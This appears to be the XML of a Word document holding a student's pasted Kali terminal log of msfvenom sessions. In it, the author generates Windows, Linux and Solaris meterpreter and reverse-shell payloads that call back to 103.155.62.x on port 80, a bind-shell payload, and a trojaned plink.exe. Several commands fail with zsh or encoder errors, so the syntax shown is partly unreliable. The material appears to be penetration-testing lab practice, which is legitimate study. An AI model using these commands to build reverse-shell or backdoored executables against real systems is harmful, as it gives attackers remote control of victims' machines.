        <w:t>No encoder specified, outputting raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5005FF98" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>Payload size: 225 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112B3AD8" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Final size of exe file: 73802 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427D3507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58682F19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2FE3BEF4" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>└─$ msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe &gt; encoded.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F216D8F" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5074D566" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>[-] No arch selected, selecting arch: x86 from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2B8AB7" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>[-] Skipping invalid encoder shikata_ga_nai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A754E17" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>[!] Couldn't find encoder to use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0141D0BB" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>No encoder specified, outputting raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F13986" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>Payload size: 354 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4538AE3C" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>Final size of exe file: 73802 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A810FF6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344E13E1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325D6B77" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>└─$ msfvenom -p windows/shell_reverse_tcp LHOST=&lt;103.155.62.2&gt; LPORT=&lt;80&gt; -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F08E12" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>zsh: no such file or directory: 103.155.62.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B871A36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69056301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EB411F4" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(103.155.62.6) LPORT=(80) -f elf &gt; reverse.elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D218965" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>msfvenom -p linux/x64/shell_reverse_tcp LHOST=103.155.62.2 LPORT=80 -f elf &gt; shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA0B3AA" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>zsh: unknown file attribute: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02198802" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288362F6" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>[-] No arch selected, selecting arch: x64 from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53782D9E" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>No encoder specified, outputting raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447AE45C" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>Payload size: 74 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39976EB8" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>Final size of elf file: 194 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017F65C2" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07"/>
    <w:p w14:paraId="0F6F7FF2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438C30CB" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:lastRenderedPageBreak/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7438C4D5" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(103.155.62.2) LPORT=(80) -f elf &gt; reverse.elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E402E2" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>msfvenom -p linux/x64/shell_reverse_tcp LHOST=103.155.62.2 LPORT=80 -f elf &gt; shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064F7A56" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>zsh: unknown file attribute: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3214EDBD" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F143D9" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>[-] No arch selected, selecting arch: x64 from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC4D405" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>No encoder specified, outputting raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730684C7" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>Payload size: 74 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C20B2A3" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>Final size of elf file: 194 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D720A3A" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07"/>
    <w:p w14:paraId="4AFF4C4E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3F1F2247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2872E4BF" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>└─$ msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(103.155.62.2) LPORT=(80) -f elf &gt; bind.elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABE3CE4" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>zsh: unknown file attribute: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F32D7EF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6C92D53F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580BC187" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>└─$ msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(103.155.62.2) LPORT=(80) -f elf -e x86/shikata_ga_nai -b '\x00' &gt; solshell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560C4AC2" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>zsh: unknown file attribute: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309CD1D7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0B2AE506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7A0C856" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">└─$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3244B6" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t xml:space="preserve">                                                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2982E02C" w14:textId="77777777" w:rsidR="00842C07" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>┌──(samiha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26ED83D6" w14:textId="1CDEBA99" w:rsidR="00692754" w:rsidRDefault="00842C07" w:rsidP="00842C07">
      <w:r>
        <w:t>└─$</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0069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07"/>
    <w:rsid w:val="00421DBA"/>
    <w:rsid w:val="00692754"/>
    <w:rsid w:val="00842C07"/>
    <w:rsid w:val="00C4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FDAB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7641E588-97D5-4438-8F6C-F6265D13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Azeem</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Samiha Azeem</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-04T21:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-04T21:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>